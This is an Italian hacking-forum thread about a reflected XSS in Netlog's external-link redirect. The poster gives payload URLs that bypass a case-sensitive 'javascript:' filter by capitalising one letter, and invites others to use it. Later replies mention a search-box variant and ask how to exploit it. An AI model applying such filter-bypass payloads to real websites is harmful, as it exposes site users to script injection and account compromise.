xss netlog

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
Y

yeat

Utente Silver
4 Aprile 2009
1
0
0
56
xss trovata oggi pomeriggio in un momento di noia se è gia stata trovata perdono altrimenti rippatela e ownatevi

http://it.netlog.com/go/out/url=

Questo è il classico url esterno di netlog cioè

http://it.netlog.com/go/out/url=http://google.it

ovviamente ho pensato di provare la classica xss tramite url "javascript" quindi


http://it.netlog.com/go/out/url=javascript: alert(1)

però ho notato che veniva bloccato l'attacco...cosi' ho pensato di scrivere in maiuscolo una lettera :p

http://it.netlog.com/go/out/url=Javascript: alert(1)

voilà xss avvenuta.. ed è sfruttabilissima testato con un mio amico ^^
 
...hanno già bloccato ;) comunque ...bravo...

...una volta batava mettere anche nel cerca :javascript:alert(1);
 
Potete sparlare quanto volete di Internet Explorer, ma se io apro quella pagina dice che mi blocca alcune funzionalità della pagina (e penso si riferisca proprio alla tua XSS) :p
 
Ho googlato un po' e ho notato che era già stata trovata ed era sfruttabile usando come url javascript però è stata fixata male come potete vedere perchè il controllo è case-sensitive
 
Mangiato pane e simpatia stamattina? -.-

Se lo chiedo è perchè non lo so forse?
 
Vicar ha detto:
Mangiato pane e simpatia stamattina? -.-

Se lo chiedo è perchè non lo so forse?
Clicca per espandere...

Aguzza l'ingegno prima di postare,se uno ti desse subito la pappa pronta dov'è la soddisfazione.
Studiati cos'è un XSS,come si fa e a che cosa serve,certe domande non servono poi.
 
.:Gaga:. ha detto:
Vicar ha detto:
Mangiato pane e simpatia stamattina? -.-

Se lo chiedo è perchè non lo so forse?
Clicca per espandere...

Aguzza l'ingegno prima di postare,se uno ti desse subito la pappa pronta dov'è la soddisfazione.
Studiati cos'è un XSS,come si fa e a che cosa serve,certe domande non servono poi.
Clicca per espandere...

mmmmh...come sfrutto questa xss gaga ? = )
 
V1R5 ha detto:
.:Gaga:. ha detto:
Vicar ha detto:
Mangiato pane e simpatia stamattina? -.-

Se lo chiedo è perchè non lo so forse?
Clicca per espandere...

Aguzza l'ingegno prima di postare,se uno ti desse subito la pappa pronta dov'è la soddisfazione.
Studiati cos'è un XSS,come si fa e a che cosa serve,certe domande non servono poi.
Clicca per espandere...

mmmmh...come sfrutto questa xss gaga ? = )
Clicca per espandere...

Se il tuo scopo è cercare di farmi dire "non lo so" ci sei riuscito,ma resta il fatto che io non ho fatto domande del genere giusto perchè le xss non so manco cosa siano,non avendole studiate.E' più una cosa di principio che va al di là che uno possa sapere o non sapere le cose no?
 
Non mi è chiaro, le XSS si studiano?
@HackLife: Anche firefox può avere quelle funzionalità, anche nativamente.
@Vicar: http://www.cheating-x.com/ <--- Ci sono gli hack di metin 2, iscriviti è gratis
 
carina jeak! Che roba però: un sito che si fa così tanto figo come netlog che ha milioni di utenti ha una vulnerabilità così XD
[OT]io comunque non posso soffrire quei posti[/OT]
 
Kattivik uno mi ha detto di iscrivermi a cheating-x senza motiov.. bah

cmq basta andare OT! Se c'è qualcuno che può spiegare gentilmente le funzioni di questa xss molto bene, altrimenti fa niente :)
 
Vicar ha detto:
Kattivik uno mi ha detto di iscrivermi a cheating-x senza motiov.. bah

cmq basta andare OT! Se c'è qualcuno che può spiegare gentilmente le funzioni di questa xss molto bene, altrimenti fa niente :)
Clicca per espandere...

bastava una ricerchina veloce veloce : http://www.infernet-x.com/xss-poc-e-dos/guida-xss-t-779.html
 
Stato
Discussione chiusa ad ulteriori risposte.

DISCUSSIONI SIMILI

0
Guida Cosa studiare per imparare l'Hacking e diventare un Ethical Hacker
  • In evidenza
  • 20
  • 13K
20
13K
Pentesting e Ethical Hacking Guide e Tools
Explosssive
Top Bottom
Indietro